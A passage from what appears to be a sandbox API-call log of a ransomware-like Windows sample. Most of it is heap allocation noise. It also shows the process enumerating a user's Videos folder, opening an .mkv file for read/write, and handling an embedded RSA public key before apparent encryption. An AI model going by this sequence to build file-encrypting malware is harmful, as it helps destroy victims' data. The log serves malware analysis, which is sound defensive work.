Size=0x830) returned 0x2d154b0 [0190.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.517] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\") returned="-DwrKzslsF2\\" [0190.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0190.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30c70 [0190.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.517] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0190.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30c70 | out: hHeap=0x6a0000) returned 1 [0190.517] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0190.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.518] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0190.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.518] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0190.518] PathFindFileNameW (pszPath="") returned="" [0190.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.518] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9426b590, ftCreationTime.dwHighDateTime=0x1d89bcf, ftLastAccessTime.dwLowDateTime=0x2720a960, ftLastAccessTime.dwHighDateTime=0x1d8a43a, ftLastWriteTime.dwLowDateTime=0x2720a960, ftLastWriteTime.dwHighDateTime=0x1d8a43a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0190.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.520] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9426b590, ftCreationTime.dwHighDateTime=0x1d89bcf, ftLastAccessTime.dwLowDateTime=0x2720a960, ftLastAccessTime.dwHighDateTime=0x1d8a43a, ftLastWriteTime.dwLowDateTime=0x2720a960, ftLastWriteTime.dwHighDateTime=0x1d8a43a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0190.520] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ae9b900, ftCreationTime.dwHighDateTime=0x1d8a40a, ftLastAccessTime.dwLowDateTime=0xa6c03a80, ftLastAccessTime.dwHighDateTime=0x1d8a51d, ftLastWriteTime.dwLowDateTime=0xa6c03a80, ftLastWriteTime.dwHighDateTime=0x1d8a51d, nFileSizeHigh=0x0, nFileSizeLow=0x11001, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jBBJYLnJ 4z9k-.mkv", cAlternateFileName="JBBJYL~1.MKV")) returned 1 [0190.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.521] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\jBBJYLnJ 4z9k-.mkv") returned=".mkv" [0190.521] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\jBBJYLnJ 4z9k-.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\jbbjylnj 4z9k-.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.522] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=69633) returned 1 [0190.522] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.525] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10fdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.525] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.527] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.527] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x11001, lpOverlapped=0x0) returned 1 [0190.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.529] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0190.530] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.530] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.530] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.530] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.530] GetLastError () returned 0x0 [0190.530] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.531] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0190.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.531] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.531] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.531] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11000) returned 0x2d45778 [0190.532] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30c70 [0190.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30c28 [0190.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.533] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bd70 [0190.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b80 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39b68 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0190.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bd70 | out: hHeap=0x6a0000) returned 1 [0190.536] GetCurrentThreadId () returned 0x264 [0190.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d446c0 [0190.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.537] GetCurrentThreadId () returned 0x264 [0190.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82d20 [0190.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b80 [0190.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 